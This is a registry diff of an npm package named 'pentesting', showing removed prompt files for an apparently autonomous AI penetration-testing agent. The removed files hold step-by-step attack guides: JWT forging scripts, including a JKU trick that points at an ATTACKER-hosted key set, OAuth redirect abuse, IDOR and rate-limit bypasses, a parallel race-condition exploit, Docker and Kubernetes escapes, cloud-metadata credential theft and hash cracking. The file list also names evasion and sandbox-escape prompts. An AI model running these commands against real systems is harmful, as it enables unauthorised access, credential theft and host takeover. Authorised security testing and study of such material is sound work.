pentesting 0.73.14 → 0.90.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +120 -49
- package/bin/pentesting.mjs +32 -0
- package/lib/runtime.mjs +419 -0
- package/package.json +17 -46
- package/scripts/postinstall.mjs +30 -0
- package/scripts/preflight-local.sh +24 -0
- package/dist/ad/prompt.md +0 -60
- package/dist/agent-tool-MMDCBQ74.js +0 -989
- package/dist/api/prompt.md +0 -63
- package/dist/chunk-4KLVUP3C.js +0 -11458
- package/dist/chunk-AEQNELCQ.js +0 -5930
- package/dist/chunk-YZNPWDNS.js +0 -1166
- package/dist/cloud/prompt.md +0 -49
- package/dist/container/prompt.md +0 -58
- package/dist/database/prompt.md +0 -58
- package/dist/email/prompt.md +0 -44
- package/dist/file-sharing/prompt.md +0 -56
- package/dist/ics/prompt.md +0 -76
- package/dist/main.d.ts +0 -1
- package/dist/main.js +0 -9737
- package/dist/network/prompt.md +0 -49
- package/dist/persistence-IGAKJZJ3.js +0 -13
- package/dist/process-registry-DNEZX4S5.js +0 -30
- package/dist/prompts/base.md +0 -436
- package/dist/prompts/ctf-crypto.md +0 -168
- package/dist/prompts/ctf-forensics.md +0 -182
- package/dist/prompts/ctf-pwn.md +0 -137
- package/dist/prompts/evasion.md +0 -215
- package/dist/prompts/exploit.md +0 -416
- package/dist/prompts/infra.md +0 -114
- package/dist/prompts/llm/analyst-system.md +0 -76
- package/dist/prompts/llm/context-extractor-system.md +0 -19
- package/dist/prompts/llm/input-processor-system.md +0 -64
- package/dist/prompts/llm/memory-synth-system.md +0 -14
- package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
- package/dist/prompts/llm/reflector-system.md +0 -16
- package/dist/prompts/llm/report-generator-system.md +0 -21
- package/dist/prompts/llm/strategist-fallback.md +0 -9
- package/dist/prompts/llm/triage-system.md +0 -47
- package/dist/prompts/main-agent.md +0 -193
- package/dist/prompts/offensive-playbook.md +0 -250
- package/dist/prompts/payload-craft.md +0 -181
- package/dist/prompts/post.md +0 -185
- package/dist/prompts/recon.md +0 -296
- package/dist/prompts/report.md +0 -98
- package/dist/prompts/strategist-system.md +0 -472
- package/dist/prompts/strategy.md +0 -163
- package/dist/prompts/techniques/README.md +0 -40
- package/dist/prompts/techniques/ad-attack.md +0 -261
- package/dist/prompts/techniques/auth-access.md +0 -256
- package/dist/prompts/techniques/container-escape.md +0 -103
- package/dist/prompts/techniques/crypto.md +0 -296
- package/dist/prompts/techniques/enterprise-pentest.md +0 -175
- package/dist/prompts/techniques/file-attacks.md +0 -144
- package/dist/prompts/techniques/forensics.md +0 -313
- package/dist/prompts/techniques/injection.md +0 -217
- package/dist/prompts/techniques/lateral.md +0 -128
- package/dist/prompts/techniques/network-svc.md +0 -229
- package/dist/prompts/techniques/pivoting.md +0 -205
- package/dist/prompts/techniques/privesc.md +0 -190
- package/dist/prompts/techniques/pwn.md +0 -595
- package/dist/prompts/techniques/reversing.md +0 -183
- package/dist/prompts/techniques/sandbox-escape.md +0 -73
- package/dist/prompts/techniques/shells.md +0 -194
- package/dist/prompts/vuln.md +0 -190
- package/dist/prompts/web.md +0 -318
- package/dist/prompts/zero-day.md +0 -298
- package/dist/remote-access/prompt.md +0 -52
- package/dist/web/prompt.md +0 -59
- package/dist/wireless/prompt.md +0 -62
|
@@ -1,256 +0,0 @@
|
|
|
1
|
-
# Authentication & Access Control Attacks — Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
|
|
4
|
-
> Do NOT follow the attack tree linearly. Use `get_owasp_knowledge`, `web_search`, and observed
|
|
5
|
-
> target behavior to decide what to test and in what order. Adapt to the target — not to this list.
|
|
6
|
-
|
|
7
|
-
> **Cross-ref**: web.md, injection.md, post.md (privesc)
|
|
8
|
-
|
|
9
|
-
## Attack Categories
|
|
10
|
-
|
|
11
|
-
```
|
|
12
|
-
AUTH/ACCESS ATTACK MAP:
|
|
13
|
-
│
|
|
14
|
-
├── 1. Authentication Bypass
|
|
15
|
-
│ ├── Default credentials → web_search("{service} default credentials")
|
|
16
|
-
│ ├── SQL injection in login: admin'-- , ' OR 1=1--, admin'/*
|
|
17
|
-
│ ├── NoSQL injection: {"username":{"$gt":""},"password":{"$gt":""}}
|
|
18
|
-
│ ├── Mass assignment: register with admin=true, role=admin, isAdmin=1
|
|
19
|
-
│ ├── Response manipulation: change HTTP response (401→200, "false"→"true")
|
|
20
|
-
│ ├── Password reset flaws:
|
|
21
|
-
│ │ ├── Predictable token, token reuse, no expiry
|
|
22
|
-
│ │ ├── Host header injection in reset link
|
|
23
|
-
│ │ ├── IDOR in reset endpoint (reset anyone's password)
|
|
24
|
-
│ │ └── Race condition: use token before invalidation
|
|
25
|
-
│ ├── MFA bypass:
|
|
26
|
-
│ │ ├── Skip to post-MFA endpoint directly
|
|
27
|
-
│ │ ├── Brute force OTP (4-6 digit = limited keyspace)
|
|
28
|
-
│ │ ├── Response manipulation (change status code)
|
|
29
|
-
│ │ ├── Backup codes brute force, default backup codes
|
|
30
|
-
│ │ └── web_search("MFA bypass techniques {year}")
|
|
31
|
-
│ ├── Remember me / persistent login:
|
|
32
|
-
│ │ ├── Predictable cookie value → forge for other users
|
|
33
|
-
│ │ ├── Insufficient entropy in token
|
|
34
|
-
│ │ └── Token not bound to IP/user-agent
|
|
35
|
-
│ └── web_search("authentication bypass techniques hacktricks")
|
|
36
|
-
│
|
|
37
|
-
├── 2. Session Attacks
|
|
38
|
-
│ ├── Session fixation: force known session ID
|
|
39
|
-
│ ├── Session hijacking: steal via XSS, network sniffing
|
|
40
|
-
│ ├── Session prediction: analyze session ID patterns → predict next
|
|
41
|
-
│ ├── Insufficient session expiry: reuse old sessions
|
|
42
|
-
│ ├── Cookie manipulation: change cookie values (user ID, role)
|
|
43
|
-
│ ├── Session puzzling: same session variable used differently
|
|
44
|
-
│ └── web_search("session attack techniques OWASP")
|
|
45
|
-
│
|
|
46
|
-
├── 3. JWT Attacks
|
|
47
|
-
│ ├── [RECON] Decode token first (never inspect raw):
|
|
48
|
-
│ │ └── python3 -c "import base64,sys,json; p=sys.argv[1].split('.'); print(json.dumps(json.loads(base64.b64decode(p[0]+'==').decode()),indent=2)); print(json.dumps(json.loads(base64.b64decode(p[1]+'==').decode()),indent=2))" <JWT>
|
|
49
|
-
│ │
|
|
50
|
-
│ ├── A. Algorithm confusion: RS256 → HS256 (sign with public key)
|
|
51
|
-
│ │ ├── Get public key from /jwks.json, /.well-known/openid-configuration, or /api/v1/certs
|
|
52
|
-
│ │ ├── Convert PEM to appropriate form and use as HMAC secret:
|
|
53
|
-
│ │ │ python3 -c "
|
|
54
|
-
│ │ │ import jwt, base64
|
|
55
|
-
│ │ │ pub = open('public.pem').read()
|
|
56
|
-
│ │ │ payload = {'sub':'admin','role':'admin','iat':9999999999}
|
|
57
|
-
│ │ │ token = jwt.encode(payload, pub, algorithm='HS256')
|
|
58
|
-
│ │ │ print(token)"
|
|
59
|
-
│ │ └── Send forged token, check if RS256 check is bypassed
|
|
60
|
-
│ │
|
|
61
|
-
│ ├── B. None algorithm: remove signature entirely
|
|
62
|
-
│ │ ├── Modify header: {"alg":"none","typ":"JWT"} → base64url encode
|
|
63
|
-
│ │ ├── Modify payload: change sub/role/admin claims
|
|
64
|
-
│ │ ├── Set signature to empty: header.payload. (trailing dot, no sig)
|
|
65
|
-
│ │ └── Try variations: "None", "NONE", "nOnE" (case sensitivity bypass)
|
|
66
|
-
│ │
|
|
67
|
-
│ ├── C. JWK/JKU injection: host your own signing key
|
|
68
|
-
│ │ ├── Generate RSA key pair: openssl genrsa -out attacker.pem 2048
|
|
69
|
-
│ │ ├── Start HTTP server: python3 -m http.server 8888
|
|
70
|
-
│ │ ├── Option 1 JKU: add "jku":"http://ATTACKER/jwks.json" to header
|
|
71
|
-
│ │ ├── Option 2 JWK: embed public key directly in "jwk" header param
|
|
72
|
-
│ │ ├── Sign token with your private key, server fetches & trusts your key
|
|
73
|
-
│ │ └── Tool: python3 -m jwt_tool <JWT> -X s -ju http://ATTACKER/jwks.json
|
|
74
|
-
│ │
|
|
75
|
-
│ ├── D. Kid (Key ID) attacks
|
|
76
|
-
│ │ ├── Path traversal: {"kid":"../../../../dev/null"} → HMAC secret = ""
|
|
77
|
-
│ │ │ Sign with empty string: python3 -c "import jwt; print(jwt.encode({'sub':'admin'}, '', algorithm='HS256'))"
|
|
78
|
-
│ │ ├── kid = "../../dev/null" → empty key → predictable signature
|
|
79
|
-
│ │ ├── SQL injection in kid: {"kid":"' UNION SELECT 'secret'--"}
|
|
80
|
-
│ │ │ → DB returns controlled value as secret → sign with that value
|
|
81
|
-
│ │ └── kid = file path to known content: /proc/sys/kernel/hostname
|
|
82
|
-
│ │
|
|
83
|
-
│ ├── E. Secret brute force
|
|
84
|
-
│ │ ├── hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
|
|
85
|
-
│ │ └── john --format=HMAC-SHA256 --wordlist=rockyou.txt jwt.txt
|
|
86
|
-
│ │
|
|
87
|
-
│ ├── F. Claim manipulation (without verifying sig)
|
|
88
|
-
│ │ ├── Change: sub, user_id, role, admin, email, exp (set far future)
|
|
89
|
-
│ │ └── Tool: python3 -m jwt_tool <JWT> -I -pc role -pv admin
|
|
90
|
-
│ │
|
|
91
|
-
│ └── web_search("JWT attack techniques portswigger {year}")
|
|
92
|
-
│ web_search("jwt_tool cheatsheet")
|
|
93
|
-
│
|
|
94
|
-
├── 4. OAuth/OpenID Connect Attacks
|
|
95
|
-
│ ├── [RECON] Map the flow first:
|
|
96
|
-
│ │ ├── Find: /authorize, /token, /userinfo, /.well-known/openid-configuration
|
|
97
|
-
│ │ ├── Note: response_type (code/token), grant_type, client_id, redirect_uri
|
|
98
|
-
│ │ └── Check: state parameter present? PKCE used?
|
|
99
|
-
│ │
|
|
100
|
-
│ ├── A. Redirect URI manipulation → token theft
|
|
101
|
-
│ │ ├── Add path: ?redirect_uri=https://legit.com/callback/../attacker.com
|
|
102
|
-
│ │ ├── Add param: ?redirect_uri=https://legit.com?x=attacker.com
|
|
103
|
-
│ │ ├── Open redirect chain: legit redirect → open redirect → attacker
|
|
104
|
-
│ │ └── Referrer leak: navigate from token URL to external resource
|
|
105
|
-
│ │
|
|
106
|
-
│ ├── B. State parameter CSRF (missing or predictable state)
|
|
107
|
-
│ │ ├── If state absent: craft malicious authorization URL → victim clicks
|
|
108
|
-
│ │ ├── If state predictable: generate valid state, pre-authorize
|
|
109
|
-
│ │ └── Result: bind victim's OAuth to attacker account
|
|
110
|
-
│ │
|
|
111
|
-
│ ├── C. Authorization code interception
|
|
112
|
-
│ │ ├── Code in URL → appears in Referer header to third-party resources
|
|
113
|
-
│ │ ├── Code in logs → check open log endpoints
|
|
114
|
-
│ │ └── Replay: codes often single-use but check if reusable
|
|
115
|
-
│ │
|
|
116
|
-
│ ├── D. PKCE bypass (Proof Key for Code Exchange)
|
|
117
|
-
│ │ ├── Check if code_challenge validation is enforced
|
|
118
|
-
│ │ ├── Try omitting code_verifier → if server accepts → PKCE not enforced
|
|
119
|
-
│ │ └── Downgrade: try response_type=token (implicit) instead of code
|
|
120
|
-
│ │
|
|
121
|
-
│ ├── E. Scope escalation
|
|
122
|
-
│ │ ├── Add scopes: openid profile email admin offline_access
|
|
123
|
-
│ │ └── Check if server returns broader access than requested
|
|
124
|
-
│ │
|
|
125
|
-
│ ├── F. Implicit flow token leakage (older pattern, still found)
|
|
126
|
-
│ │ ├── Token in URL fragment → appears in browser history, Referer
|
|
127
|
-
│ │ └── Single-page apps may log token to console/error handlers
|
|
128
|
-
│ │
|
|
129
|
-
│ ├── G. SSRF via OAuth
|
|
130
|
-
│ │ ├── authorization URL → internal service scan
|
|
131
|
-
│ │ └── request_uri in PAR (Pushed Authorization Requests)
|
|
132
|
-
│ │
|
|
133
|
-
│ └── web_search("OAuth security vulnerabilities exploitation portswigger")
|
|
134
|
-
│ web_search("OAuth 2.0 attack techniques {year}")
|
|
135
|
-
│
|
|
136
|
-
├── 5. IDOR (Insecure Direct Object Reference)
|
|
137
|
-
│ ├── Parameter manipulation: /api/user/123 → /api/user/124
|
|
138
|
-
│ ├── In: URL, POST body, JSON, cookies, headers, file names
|
|
139
|
-
│ ├── Encoded IDs: base64 decode → modify → re-encode
|
|
140
|
-
│ ├── UUID/GUID: not always random (predictable in some implementations)
|
|
141
|
-
│ ├── Sequential testing: iterate through IDs systematically
|
|
142
|
-
│ ├── HTTP method change: GET blocked → POST, PUT, PATCH, DELETE
|
|
143
|
-
│ └── Affects: view/edit/delete other users' data, access admin functions
|
|
144
|
-
│
|
|
145
|
-
├── 6. Access Control Bypass
|
|
146
|
-
│ ├── Horizontal: access other users' resources (same privilege level)
|
|
147
|
-
│ ├── Vertical: access admin/higher-privilege resources
|
|
148
|
-
│ ├── Method-based: POST blocked → GET, PUT, PATCH, OPTIONS
|
|
149
|
-
│ ├── Path-based: /admin/ blocked → /ADMIN/, /Admin, /./admin/, //admin
|
|
150
|
-
│ ├── Header-based: X-Original-URL, X-Rewrite-URL, X-Forwarded-For
|
|
151
|
-
│ ├── Referer-based: add expected Referer header
|
|
152
|
-
│ ├── IP-based: add X-Forwarded-For: 127.0.0.1
|
|
153
|
-
│ ├── API versioning: /api/v1/admin blocked → /api/v2/admin, /api/internal/
|
|
154
|
-
│ ├── Parameter pollution: duplicate parameters with different values
|
|
155
|
-
│ └── web_search("access control bypass techniques hacktricks")
|
|
156
|
-
│
|
|
157
|
-
├── 7. Rate Limiting Bypass
|
|
158
|
-
│ ├── IP rotation headers: X-Forwarded-For, X-Real-IP, X-Originating-IP
|
|
159
|
-
│ ├── Different endpoints: /login vs /LOGIN vs /Login
|
|
160
|
-
│ ├── Parameter pollution: add dummy parameters
|
|
161
|
-
│ ├── Different HTTP methods: POST → PUT
|
|
162
|
-
│ ├── Unicode variations: admin vs admın (dotless i)
|
|
163
|
-
│ ├── Distributed: multiple source IPs
|
|
164
|
-
│ └── Timing: slow down just below rate limit threshold
|
|
165
|
-
│
|
|
166
|
-
└── 8. Business Logic Flaws & Race Conditions
|
|
167
|
-
├── Price manipulation: negative quantities, decimal exploitation
|
|
168
|
-
├── Workflow bypass: skip steps (order→pay→confirm → order→confirm)
|
|
169
|
-
├── Type juggling: PHP == vs === (0 == "string" → true)
|
|
170
|
-
├── Integer overflow: very large numbers → wrap to negative/zero
|
|
171
|
-
├── Referral/reward abuse: self-referral, race condition on signup
|
|
172
|
-
│
|
|
173
|
-
└── Race Conditions (Limit-Override / TOCTOU):
|
|
174
|
-
├── [DETECTION] Does action have a check → use window?
|
|
175
|
-
│ └── Examples: balance check, coupon validity, token invalidation
|
|
176
|
-
│
|
|
177
|
-
├── [EXPLOIT A] Parallel HTTP requests (asyncio — write file, run it)
|
|
178
|
-
│ write_file path=".pentesting/workspace/race.py" content="""
|
|
179
|
-
│ import asyncio, aiohttp, sys
|
|
180
|
-
│
|
|
181
|
-
│ URL = sys.argv[1] if len(sys.argv)>1 else 'http://TARGET/endpoint'
|
|
182
|
-
│ DATA = {'coupon': 'SAVE50', 'amount': '100'}
|
|
183
|
-
│ PARALLEL = 50
|
|
184
|
-
│
|
|
185
|
-
│ async def race():
|
|
186
|
-
│ async with aiohttp.ClientSession() as s:
|
|
187
|
-
│ tasks = [s.post(URL, data=DATA) for _ in range(PARALLEL)]
|
|
188
|
-
│ results = await asyncio.gather(*tasks, return_exceptions=True)
|
|
189
|
-
│ for i, r in enumerate(results):
|
|
190
|
-
│ if hasattr(r,'status'):
|
|
191
|
-
│ text = await r.text()
|
|
192
|
-
│ print(f'[{i}] {r.status}: {text[:100]}')
|
|
193
|
-
│ asyncio.run(race())
|
|
194
|
-
│ """
|
|
195
|
-
│ Then: run_cmd "python3 .pentesting/workspace/race.py http://TARGET/redeem"
|
|
196
|
-
│
|
|
197
|
-
├── [EXPLOIT B] curl parallel (no Python needed)
|
|
198
|
-
│ run_cmd "seq 50 | xargs -P50 -I{} curl -s -X POST http://TARGET/redeem -d 'coupon=SAVE50'"
|
|
199
|
-
│
|
|
200
|
-
├── [EXPLOIT C] TOCTOU symlink race (file operations)
|
|
201
|
-
│ ├── Monitor: inotifywait -m /tmp/uploads -e create
|
|
202
|
-
│ ├── Race: while true; do ln -sf /etc/passwd /tmp/target; done
|
|
203
|
-
│ └── Trigger upload simultaneously
|
|
204
|
-
│
|
|
205
|
-
├── [SUCCESS SIGNAL] One request returns 200, others return 409/error
|
|
206
|
-
│ └── If all return 200 → not fixed, try extracting duplicate benefit
|
|
207
|
-
│
|
|
208
|
-
└── web_search("race condition portswigger limit override")
|
|
209
|
-
web_search("TOCTOU exploit {context} {year}")
|
|
210
|
-
```
|
|
211
|
-
|
|
212
|
-
## JWT Decision Tree
|
|
213
|
-
```
|
|
214
|
-
Intercept JWT →
|
|
215
|
-
├── Decode header → check "alg" field
|
|
216
|
-
│ ├── "RS256"/"ES256" → try A (HS256 confusion) + C (JWK inject)
|
|
217
|
-
│ ├── "HS256" → try E (brute force) + D (kid attacks)
|
|
218
|
-
│ └── "none" → already vulnerable, forge freely
|
|
219
|
-
├── Check "kid" field present? → try D (path traversal + SQLi)
|
|
220
|
-
├── Check "jku"/"jwk" field? → try C (inject your own key)
|
|
221
|
-
└── No strong alg? → try B (none algorithm)
|
|
222
|
-
```
|
|
223
|
-
|
|
224
|
-
## Session & Token Extraction (save_session workflow)
|
|
225
|
-
```
|
|
226
|
-
After browse_url or fill_form with save_session: true, TWO files are saved:
|
|
227
|
-
|
|
228
|
-
.pentesting/workspace/browser-session.json → Playwright state (use_session)
|
|
229
|
-
.pentesting/workspace/auth-headers.json → Extracted headers for ANY tool
|
|
230
|
-
|
|
231
|
-
auth-headers.json example:
|
|
232
|
-
{ "Authorization": "Bearer eyJ0eXAiOiJKV1Q...", "Cookie": "session=abc123" }
|
|
233
|
-
|
|
234
|
-
Reuse in run_cmd:
|
|
235
|
-
AUTH=.pentesting/workspace/auth-headers.json
|
|
236
|
-
TOKEN=$(jq -r .Authorization $AUTH)
|
|
237
|
-
COOKIE=$(jq -r '.["Cookie"]' $AUTH)
|
|
238
|
-
|
|
239
|
-
curl -s -H "Authorization: $TOKEN" -H "Cookie: $COOKIE" http://TARGET/api/admin
|
|
240
|
-
sqlmap -u "http://TARGET/api/data?id=1" --headers="Authorization: $TOKEN" --dbs
|
|
241
|
-
python3 -c "import json,requests; h=json.load(open('$AUTH')); print(requests.get('http://TARGET/api/me',headers=h).text)"
|
|
242
|
-
|
|
243
|
-
If Authorization key is missing (session-only app):
|
|
244
|
-
curl -b "$COOKIE" http://TARGET/admin
|
|
245
|
-
```
|
|
246
|
-
|
|
247
|
-
## Search Patterns
|
|
248
|
-
```
|
|
249
|
-
web_search("{auth_mechanism} bypass techniques")
|
|
250
|
-
web_search("broken access control exploitation hacktricks")
|
|
251
|
-
web_search("IDOR exploitation techniques {year}")
|
|
252
|
-
web_search("{technology} authentication vulnerability")
|
|
253
|
-
web_search("PayloadsAllTheThings {attack_type}")
|
|
254
|
-
web_search("jwt_tool usage portswigger")
|
|
255
|
-
web_search("OAuth 2.0 vulnerability {grant_type} exploitation")
|
|
256
|
-
```
|
|
@@ -1,103 +0,0 @@
|
|
|
1
|
-
# Container Escape & Cloud Attack Techniques
|
|
2
|
-
|
|
3
|
-
## Docker Container Detection
|
|
4
|
-
```
|
|
5
|
-
Am I in a container?
|
|
6
|
-
├── cat /proc/1/cgroup → contains "docker" or container ID?
|
|
7
|
-
├── ls /.dockerenv → exists = Docker container
|
|
8
|
-
├── hostname → random hex string = likely container
|
|
9
|
-
├── mount | grep overlay → overlay filesystem = container
|
|
10
|
-
├── cat /proc/self/status | grep CapEff → limited capabilities?
|
|
11
|
-
└── env | grep -i docker → Docker-related env vars?
|
|
12
|
-
```
|
|
13
|
-
|
|
14
|
-
## Docker Escape Techniques
|
|
15
|
-
```
|
|
16
|
-
1. Privileged container (--privileged):
|
|
17
|
-
├── Full device access → mount host filesystem
|
|
18
|
-
│ mkdir /mnt/host && mount /dev/sda1 /mnt/host
|
|
19
|
-
│ cat /mnt/host/root/root.txt
|
|
20
|
-
├── nsenter: nsenter --target 1 --mount --uts --ipc --net --pid
|
|
21
|
-
└── Load kernel module: insmod backdoor.ko
|
|
22
|
-
|
|
23
|
-
2. Docker socket mounted (-v /var/run/docker.sock):
|
|
24
|
-
├── docker -H unix:///var/run/docker.sock ps
|
|
25
|
-
├── Create privileged container:
|
|
26
|
-
│ docker run -it --privileged --pid=host -v /:/host ubuntu chroot /host
|
|
27
|
-
└── Access host filesystem through new container
|
|
28
|
-
|
|
29
|
-
3. Dangerous capabilities:
|
|
30
|
-
├── CAP_SYS_ADMIN → mount host devices, use nsenter
|
|
31
|
-
├── CAP_SYS_PTRACE → process injection, debug host processes
|
|
32
|
-
├── CAP_NET_ADMIN → ARP spoof, network manipulation
|
|
33
|
-
├── CAP_DAC_READ_SEARCH → read any file
|
|
34
|
-
└── Check: capsh --print | grep Current
|
|
35
|
-
|
|
36
|
-
4. Writable host paths:
|
|
37
|
-
├── If anything is mounted from host (-v /hostpath:/container):
|
|
38
|
-
│ Write to that path to affect host
|
|
39
|
-
├── Common: /var/log, /tmp, /opt, config directories
|
|
40
|
-
└── Write crontab/SSH key to mounted host path
|
|
41
|
-
|
|
42
|
-
5. Kernel exploits:
|
|
43
|
-
├── Container shares kernel with host
|
|
44
|
-
├── uname -r → search for kernel CVEs
|
|
45
|
-
├── CVE-2022-0847 (DirtyPipe)
|
|
46
|
-
├── CVE-2022-0185 (fsconfig heap overflow)
|
|
47
|
-
└── CVE-2024-21626 (runc breakout via /proc/self/fd)
|
|
48
|
-
|
|
49
|
-
6. Docker API (2375/2376):
|
|
50
|
-
├── Unauthenticated Docker API = instant host compromise
|
|
51
|
-
├── docker -H tcp://<target>:2375 ps
|
|
52
|
-
└── Create privileged container mounting host /
|
|
53
|
-
```
|
|
54
|
-
|
|
55
|
-
## Kubernetes Escape
|
|
56
|
-
```
|
|
57
|
-
1. Service account token:
|
|
58
|
-
├── cat /var/run/secrets/kubernetes.io/serviceaccount/token
|
|
59
|
-
├── Use token to query API: curl -sk https://kubernetes.default.svc/api/v1/
|
|
60
|
-
├── Enumerate permissions: kubectl auth can-i --list
|
|
61
|
-
└── If can create pods → privileged pod escape
|
|
62
|
-
|
|
63
|
-
2. Privileged pod:
|
|
64
|
-
├── Create pod with hostPID, hostNetwork, privileged: true
|
|
65
|
-
├── Mount host filesystem: volumeMounts hostPath /
|
|
66
|
-
└── nsenter --target 1 --mount --uts --ipc --net --pid bash
|
|
67
|
-
|
|
68
|
-
3. etcd access:
|
|
69
|
-
├── etcd often unauthenticated on port 2379
|
|
70
|
-
├── Contains ALL K8s secrets: etcdctl get --prefix /registry/secrets
|
|
71
|
-
└── Includes service account tokens, DB passwords, etc.
|
|
72
|
-
|
|
73
|
-
4. Common K8s misconfigs:
|
|
74
|
-
├── Dashboard without auth (port 8443/30000)
|
|
75
|
-
├── Tiller (Helm v2) without auth → arbitrary K8s operations
|
|
76
|
-
├── Kubelet API (10250) without auth → exec into any pod
|
|
77
|
-
│ curl -sk https://<node>:10250/pods
|
|
78
|
-
│ curl -sk https://<node>:10250/exec/<ns>/<pod>/<container> -d "cmd=id"
|
|
79
|
-
└── RBAC misconfiguration → escalate to cluster-admin
|
|
80
|
-
```
|
|
81
|
-
|
|
82
|
-
## Cloud Metadata
|
|
83
|
-
```
|
|
84
|
-
Cloud metadata endpoints (SSRF targets):
|
|
85
|
-
├── AWS: http://169.254.169.254/latest/meta-data/
|
|
86
|
-
│ ├── /iam/security-credentials/ → IAM role credentials
|
|
87
|
-
│ ├── /user-data → startup scripts (often contain secrets)
|
|
88
|
-
│ └── IMDSv2: TOKEN=$(curl -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
|
|
89
|
-
│ curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
|
|
90
|
-
├── GCP: http://metadata.google.internal/computeMetadata/v1/
|
|
91
|
-
│ └── Requires header: Metadata-Flavor: Google
|
|
92
|
-
├── Azure: http://169.254.169.254/metadata/instance?api-version=2021-02-01
|
|
93
|
-
│ └── Requires header: Metadata: true
|
|
94
|
-
└── DigitalOcean: http://169.254.169.254/metadata/v1/
|
|
95
|
-
|
|
96
|
-
Post-exploitation with cloud creds:
|
|
97
|
-
├── AWS: Configure aws cli → enumerate IAM, S3, Lambda, EC2
|
|
98
|
-
│ aws sts get-caller-identity
|
|
99
|
-
│ aws s3 ls
|
|
100
|
-
│ aws iam list-users
|
|
101
|
-
├── GCP: gcloud auth activate-service-account → enumerate
|
|
102
|
-
└── Azure: az login → enumerate resources
|
|
103
|
-
```
|
|
@@ -1,296 +0,0 @@
|
|
|
1
|
-
# Cryptography Attack Techniques
|
|
2
|
-
|
|
3
|
-
## Hash Cracking
|
|
4
|
-
```
|
|
5
|
-
Identify hash type:
|
|
6
|
-
├── hashid <hash> OR hash-identifier
|
|
7
|
-
├── Online: hashes.com, crackstation.net
|
|
8
|
-
└── hashcat --example-hashes | grep -B1 <hash_start>
|
|
9
|
-
|
|
10
|
-
Crack with hashcat:
|
|
11
|
-
├── MD5: hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
|
|
12
|
-
├── SHA1: hashcat -m 100 hash.txt rockyou.txt
|
|
13
|
-
├── SHA256: hashcat -m 1400 hash.txt rockyou.txt
|
|
14
|
-
├── bcrypt: hashcat -m 3200 hash.txt rockyou.txt
|
|
15
|
-
├── NTLM: hashcat -m 1000 hash.txt rockyou.txt
|
|
16
|
-
├── Kerberos TGS: hashcat -m 13100 hash.txt rockyou.txt
|
|
17
|
-
├── NetNTLMv2: hashcat -m 5600 hash.txt rockyou.txt
|
|
18
|
-
└── With rules: hashcat -m 0 hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
|
|
19
|
-
|
|
20
|
-
John the Ripper:
|
|
21
|
-
├── john --wordlist=rockyou.txt hash.txt
|
|
22
|
-
├── john --show hash.txt
|
|
23
|
-
└── john --rules=All hash.txt
|
|
24
|
-
```
|
|
25
|
-
|
|
26
|
-
## RSA Attacks
|
|
27
|
-
```
|
|
28
|
-
When you find RSA parameters (n, e, c, p, q):
|
|
29
|
-
|
|
30
|
-
Small n → factor with:
|
|
31
|
-
├── factordb.com (online)
|
|
32
|
-
├── RsaCtfTool: python3 RsaCtfTool.py -n <n> -e <e> --uncipher <c>
|
|
33
|
-
└── yafu: yafu "factor(n)"
|
|
34
|
-
|
|
35
|
-
Common RSA weaknesses:
|
|
36
|
-
├── Small e (e=3) → cube root attack
|
|
37
|
-
├── Common modulus → shared p or q between keys
|
|
38
|
-
├── Wiener's attack → small d (large e)
|
|
39
|
-
├── Hastad's broadcast → same m encrypted with different n, same small e
|
|
40
|
-
├── Bleichenbacher → padding oracle on PKCS#1 v1.5
|
|
41
|
-
├── Fermat factoring → p and q close together
|
|
42
|
-
└── Twin prime → p = q ± 2
|
|
43
|
-
|
|
44
|
-
Python template:
|
|
45
|
-
from Crypto.Util.number import *
|
|
46
|
-
n, e, c = ...
|
|
47
|
-
# After finding p, q:
|
|
48
|
-
phi = (p-1)*(q-1)
|
|
49
|
-
d = inverse(e, phi)
|
|
50
|
-
m = pow(c, d, n)
|
|
51
|
-
print(long_to_bytes(m))
|
|
52
|
-
```
|
|
53
|
-
|
|
54
|
-
## Classical Ciphers
|
|
55
|
-
```
|
|
56
|
-
Common in CTF misc/crypto:
|
|
57
|
-
├── Caesar/ROT13: Try all 26 shifts → dcode.fr/caesar-cipher
|
|
58
|
-
├── Vigenère: Key analysis → dcode.fr/vigenere-cipher
|
|
59
|
-
├── XOR: Single-byte XOR brute → CyberChef XOR Brute Force
|
|
60
|
-
├── Substitution: Frequency analysis → quipqiup.com
|
|
61
|
-
├── Base encodings:
|
|
62
|
-
│ ├── Base64: = padding, A-Za-z0-9+/
|
|
63
|
-
│ ├── Base32: = padding, A-Z2-7
|
|
64
|
-
│ └── Base85/ASCII85: ~> delimiter
|
|
65
|
-
├── Hex: 0-9a-f only → xxd -r -p
|
|
66
|
-
└── Morse/Braille/Semaphore: visual pattern recognition
|
|
67
|
-
```
|
|
68
|
-
|
|
69
|
-
## Padding Oracle Attack
|
|
70
|
-
```
|
|
71
|
-
When you can detect valid vs invalid padding:
|
|
72
|
-
├── padbuster: padbuster <URL> <encrypted_sample> <block_size>
|
|
73
|
-
│ Options: -cookies "auth=<encrypted>" -encoding 0 (lowercase hex)
|
|
74
|
-
├── Manual: Compare response to correct vs incorrect padding
|
|
75
|
-
└── Decrypt AND forge new tokens — often leads to admin access
|
|
76
|
-
```
|
|
77
|
-
|
|
78
|
-
## Elliptic Curve Attacks
|
|
79
|
-
```
|
|
80
|
-
ECC vulnerabilities in CTF:
|
|
81
|
-
├── Invalid curve attack:
|
|
82
|
-
│ Point not validated → send point on weak curve
|
|
83
|
-
│ Compute DLP on weak curve → recover private key
|
|
84
|
-
├── Smart's attack: anomalous curves (trace=1)
|
|
85
|
-
│ Lift to p-adic → solve in O(1)
|
|
86
|
-
├── MOV attack: small embedding degree
|
|
87
|
-
│ Move DLP to finite field via Weil pairing
|
|
88
|
-
├── Pohlig-Hellman: smooth curve order
|
|
89
|
-
│ Factor order → solve DLP in subgroups → CRT
|
|
90
|
-
├── ECDSA nonce reuse (k reuse):
|
|
91
|
-
│ Two signatures with same k → recover private key
|
|
92
|
-
│ s1*k - H(m1) ≡ s2*k - H(m2) mod n
|
|
93
|
-
